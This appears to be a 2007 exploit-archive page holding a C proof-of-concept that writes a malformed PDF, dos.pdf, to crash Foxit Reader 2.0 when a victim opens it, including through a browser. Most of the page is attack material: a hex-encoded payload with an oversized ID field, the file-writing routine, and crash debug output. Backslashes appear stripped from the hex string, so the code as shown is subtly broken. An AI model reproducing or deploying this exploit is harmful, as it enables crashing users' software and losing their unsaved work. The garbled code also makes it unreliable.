[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit
# Published : 2007-04-20
# Author : n00b
# Previous Title : eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC
# Next Title : Winamp <= 5.3 (WMV File) Remote Denial of Service Exploit
/**
*Created Friday, April 20 2007
*
*Moderator of http://igniteds.net
*
*Foxit Reader 2.0 for Windows Remote dos exploit created by n00b
*Foxit pdf viewer is prone to a dos exploit
*by opening a malformed pdf document it is possible
*to crash foxit reader which could cause the vic to
*lose any unsaved data..The vender has been notified
*Vendors web site http://www.foxitsoftware.com.
*It is possible to crash the foxit reader via opera
*or Internet exploer upon opening the pdf file to view
*online.
*Tested on : windows xp service packs 1 and 2
*linux version not tested.
*
*Shouts to every one at milw0rm and IG.
*Credits go to n00b for finding this vulnerability.
*
*To compile use dev-c ++
*
* ..Debug info..
*************************************************************************
*****************
*(7e90.7e94): Access violation - code c0000005 (first chance)
*First chance exceptions are reported before any exception handling.
*This exception may be expected and handled.
*eax=00000000 ebx=5d8a0000 ecx=1d89fff0 edx=7627ffc0 esi=00f9ac2c edi=00000040
*eip=0049b291 esp=0012f614 ebp=5d8a0000 iopl=0 nv up ei pl nz ac pe nc
*cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
**** ERROR: Module load completed but symbols could not be loaded for
C:Program FilesFoxit Reader.exe
*Foxit_Reader+0x9b291:
*0049b291 f3ab rep stos dword ptr es:[edi] es:0023:00000040=????????
*************************************************************************
********************************
**/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#define PDF "dos.pdf"
#define Credits_to "n00b"
char evil_code[] =
"x25x50x44x46x2dx31x2ex33x0dx0ax25xe2xe3xcfxd3x0d"
"x0ax31x34x20x30x20x6fx62x6ax0dx0ax3cx3cx20x0dx0a"
"x2fx4cx69x6ex65x61x72x69x7ax65x64x20x31x20x0dx0a"
"x2fx4fx20x31x37x20x0dx0ax2fx48x20x5bx20x39x31x31"
"x20x31x37x37x20x5dx20x0dx0ax2fx4cx20x33x39x37x38"
"x20x0dx0ax2fx45x20x32x36x37x32x20x0dx0ax2fx4ex20"
"x31x20x0dx0ax2fx54x20x33x35x38x30x20x0dx0ax3ex3e"
"x20x0dx0ax65x6ex64x6fx62x6ax0dx0ax20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x78x72x65x66x0dx0ax31"
"x34x20x31x38x20x0dx0ax30x30x30x30x30x30x30x30x31"
"x36x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x30x37x30x36x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x30x38x36x30x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x31x30x38x38x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x31x33x32"
"x39x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x31x34x30x39x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x31x35x30x38x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x31x36x31x34x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x31x37x30"
"x39x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x31x38x30x39x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x31x38x35x33x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x31x38x38x32x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x32x33x34"
"x30x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x32x34x34x36x20x30x30x30x30x30x20x6ex0dx0ax30"
"x30x30x30x30x30x32x34x36x37x20x30x30x30x30x30x20"
"x6ex0dx0ax30x30x30x30x30x30x32x35x37x31x20x30x30"
"x30x30x30x20x6ex0dx0ax30x30x30x30x30x30x30x39x31"
"x31x20x30x30x30x30x30x20x6ex0dx0ax30x30x30x30x30"
"x30x31x30x36x38x20x30x30x30x30x30x20x6ex0dx0ax74"
"x72x61x69x6cx65x72x0dx0ax3cx3cx0dx0ax2fx53x69x7a"
"x65x20x39x39x39x39x39x0dx0ax2fx49x6ex66x6fx20x32"
"x20x30x20x52x20x0dx0ax2fx52x6fx6fx74x20x31x35x20"
"x30x20x52x20x0dx0ax2fx50x72x65x76x20x33x35x37x30"
"x20x0dx0ax2fx49x44x5bx3cx41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41"
"x41x41x41x41x41x41x3ex5dx0dx0ax3ex3ex0dx0ax73x74"
"x61x72x74x78x72x65x66x0dx0ax30x0dx0ax25x25x45x4f"
"x46x0dx0ax20x20x20x20x20x20x0dx0ax31x35x20x30x20"
"x6fx62x6ax0dx0ax3cx3cx20x0dx0ax2fx54x79x70x65x20"
"x2fx43x61x74x61x6cx6fx67x20x0dx0ax2fx50x61x67x65"
"x73x20x31x20x30x20x52x20x0dx0ax2fx53x74x72x75x63"
"x74x54x72x65x65x52x6fx6fx74x20x32x32x20x30x20x52"
"x20x0dx0ax2fx53x70x69x64x65x72x49x6ex66x6fx20x33"
"x20x30x20x52x20x0dx0ax2fx4ex61x6dx65x73x20x31x36"
"x20x30x20x52x20x0dx0ax2fx4fx75x74x6cx69x6ex65x73"
"x20x31x38x20x30x20x52x20x0dx0ax2fx50x61x67x65x4d"
"x6fx64x65x20x2fx55x73x65x4fx75x74x6cx69x6ex65x73"
"x20x0dx0ax3ex3ex20x0dx0ax65x6ex64x6fx62x6ax0dx0a"
"x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39x39"
"x39x20x30x20x6fx62x6ax0dx0ax3cx3cx20x0dx0ax0dx0a"
"x31x37x33x0dx0ax25x25x45x4fx46x0dx0a";
int main() {
FILE *File;
int i = 0;
if((File=fopen(PDF,"wb")) == NULL) {
printf("fuck We are Unable to build the file %s", PDF);
exit(0);
}
printf("Creating pdf File please waitn");
for(i=0;i<sizeof(evil_code)-1;i++)
fputc(evil_code[i],File);
fclose(File);
printf("pdf file %s successfully created hoooha..n", PDF);
return 0;
}
# www.Syue.com [2007-04-20]